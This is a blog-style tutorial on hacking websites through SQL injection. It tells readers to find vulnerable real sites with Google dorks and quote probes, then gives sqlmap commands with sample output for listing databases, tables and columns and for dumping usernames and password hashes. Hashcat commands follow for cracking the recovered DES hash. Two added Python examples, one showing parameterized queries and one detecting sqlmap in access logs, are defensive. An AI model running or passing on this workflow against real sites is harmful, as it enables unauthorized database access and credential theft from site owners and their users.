Hi friends, today I will explain sqlmap techniques for hacking a website, but first you need to know what sqlmap is.
So let's start with the basics of sqlmap.
What is SQLMAP
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
This list is really long. It took me a long time to collect them. If you know SQL, then you can add more here. Put them in the comment section and I will add them here.
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue about which one is best, but to me the following is the simplest and most conclusive.
Let's say you searched using this string
inurl:item_id=
and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quote mark ' at the end of the URL. (Just to be sure, " is a double quote mark and ' is a single quote mark.) So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.
Examples of SQLi Errors from Different Databases and Languages
Microsoft SQL Server
Server Error in ‘/’ Application.
Unclosed quotation mark before the character string ‘attack;’.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.
MySQL Errors
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12
Oracle Errors
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated
PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near “‘’’”
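Why the appended single quote produces these errors, and what makes them go away, shown as an added example that is not part of the original post. SQLite stands in for the page's MySQL back end, and the item table's columns and both handler functions are assumptions made for the illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (item_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO item VALUES (15, 'widget')")
    return conn


def lookup_vulnerable(conn, item_id):
    """Builds the query by string concatenation and echoes database errors."""
    # The request value becomes part of the SQL text, so a trailing quote
    # opens a string literal that is never closed and the parser rejects it.
    sql = "SELECT name FROM item WHERE item_id = " + item_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Returning the driver message is what tells a visitor the input
        # reached the SQL parser (the error pages listed above).
        return 500, f"SQL error: {exc}"
    return (200, row[0]) if row else (404, "not found")


def lookup_hardened(conn, item_id):
    """Validates the input, binds it as a parameter, hides database errors."""
    # item_id is numeric by design: reject anything else before the database.
    if not (item_id.isascii() and item_id.isdigit() and len(item_id) <= 9):
        return 400, "invalid item_id"
    try:
        # The value travels separately from the SQL text, so it can never
        # change the structure of the statement.
        row = conn.execute(
            "SELECT name FROM item WHERE item_id = ?", (int(item_id),)
        ).fetchone()
    except sqlite3.Error:
        # Log details server-side; the client only sees a generic message.
        return 500, "internal error"
    return (200, row[0]) if row else (404, "not found")


if __name__ == "__main__":
    db = make_db()
    for value in ("15", "15'"):
        print(repr(value), lookup_vulnerable(db, value), lookup_hardened(db, value))
```

Parameter binding is the actual fix; input validation and generic error pages only reduce what leaks when something else goes wrong.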
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that vulnerable database (this is also called enumerating the number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command on your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases
See screenshot below.
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database for almost every MySQL database. So our interest would be in the sqldummywebsite database.
Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns on the target table user_info of the sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from the target table user_info of the sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for … target columns user_login and user_password.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there, we now only need the password for this user. The next step shows just that.
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You’re probably getting used to how to use the SQLMAP SQL Injection tool. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have the password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
That is exactly right. This is a hashed password. That means the stored value is not the password itself, and now we need to crack the hash to recover it.
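What Steps 2 to 6 look like from the server side, as an added example that is not part of the original post: a detector run over web access log lines for the manual quote probe and for sqlmap's enumeration requests. The log lines, IP addresses, sqlmap version string and function names are constructed for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# SQL fragments that have no business inside a numeric item_id parameter.
SQL_TOKENS = re.compile(
    r"\bunion\b.+\bselect\b|\binformation_schema\b|\bsleep\s*\(|"
    r"\b(?:and|or)\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def reasons_for(line):
    """Return (client_ip, [reasons]) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    reasons = []
    # sqlmap announces itself by default; the header is client-controlled,
    # so treat it as a strong hit but never as the only check.
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    query = unquote_plus(urlsplit(m["url"]).query)
    # The manual probe from Step 1.b: a lone quote appended to a parameter.
    if query.count("'") % 2 == 1:
        reasons.append("unbalanced-quote")
    if SQL_TOKENS.search(query):
        reasons.append("sql-keywords")
    return m["ip"], reasons


def suspicious_clients(lines, threshold=2):
    """Map client IP -> sorted reasons, for clients with >= threshold flagged requests."""
    counts = defaultdict(int)
    seen = defaultdict(set)
    for line in lines:
        parsed = reasons_for(line)
        if parsed is None or not parsed[1]:
            continue
        ip, reasons = parsed
        counts[ip] += 1
        seen[ip].update(reasons)
    return {ip: sorted(seen[ip]) for ip in counts if counts[ip] >= threshold}


def make_line(ip, value, ua):
    """Build one constructed log line for the page's dummy URL."""
    return (f'{ip} - - [12/Mar/2024:10:55:53 +0000] "GET /cgi-bin/item.cgi'
            f'?item_id={value} HTTP/1.1" 200 512 "-" "{ua}"')


# Constructed sample log (documentation IP ranges only).
SAMPLE_LOG = [
    make_line("192.0.2.10", "15", "Mozilla/5.0"),
    make_line("198.51.100.7", "15%27", "Mozilla/5.0"),
    make_line("203.0.113.5", "15", "sqlmap/1.7#stable (https://sqlmap.org)"),
    make_line("203.0.113.5", "15%20AND%204821%3D4821", "sqlmap/1.7#stable (https://sqlmap.org)"),
    make_line("203.0.113.5", "15%20UNION%20ALL%20SELECT%20NULL--%20-", "sqlmap/1.7#stable (https://sqlmap.org)"),
]

if __name__ == "__main__":
    for ip, why in suspicious_clients(SAMPLE_LOG).items():
        print(ip, why)
```

A single apostrophe can be legitimate input in free-text parameters, which is why one hit stays below the default threshold while the repeated requests in Steps 2 to 6 cross it.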
Step 7: Cracking password
So the hashed password is 24iYBc17xK0e. (including the trailing dot).
How do you know what type of hash that is?
Step 7.a: Identify Hash type
Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash this is. In the command line, type in the following command and at the prompt paste the hash value:
hash-identifier
Step 7.b: Crack HASH using cudahashcat
First of all I need to know which code to use for DES hashes. So let’s check that:
cudahashcat --help | grep DES
I am running a computer that has an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop, I have an AMD ATI graphics card, so I will be using oclHashcat on my laptop.
If you’re on VirtualBox or VMware, neither cudahashcat nor oclhashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website, search around.
I saved the hash value 24iYBc17xK0e. in the DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
However, both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123.
24iYBc17xK0e.:abc123
So we have successfully hacked the website...